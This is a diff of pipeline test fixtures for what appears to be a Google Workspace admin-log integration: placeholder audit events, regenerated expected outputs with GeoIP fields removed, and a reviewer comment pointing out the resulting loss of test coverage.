+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}} 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json
index 83c7dcd8654..e9f2d74ccfc 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -34,35 +34,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091147900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915758200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}",
 "provider": "admin",
 "action": "CHANGE_ACCOUNT_AUTO_RENEWAL",
 "id": "1",
@@ -92,7 +74,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
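Review bot: The regenerated expectation drops the whole `source.geo` and `source.as` objects instead of replacing their values, so this test no longer covers the pipeline's GeoIP/ASN enrichment at all; the same happens in the hunks at `@@ -116,35 +98,17 @@`, `@@ -198,35 +162,17 @@`, `@@ -280,35 +226,17 @@` and `@@ -362,35 +290,17 @@`. As far as I recall, 67.43.156.13 is one of the addresses covered by the elastic-package test GeoIP database, so if the pipeline still carries a geoip processor the expected documents should contain a geo block with that database's fixed values rather than none, which suggests these files were generated against a stack without the test database loaded. I would regenerate the expected files with elastic-package's `--generate` option in the standard test stack and confirm that `source.geo` and `source.as` reappear before merging. If the removal is intentional because enrichment was moved elsewhere, a sentence in the PR description saying so would spare the next reader the same question.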
@@ -116,35 +98,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091161100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915761700Z",
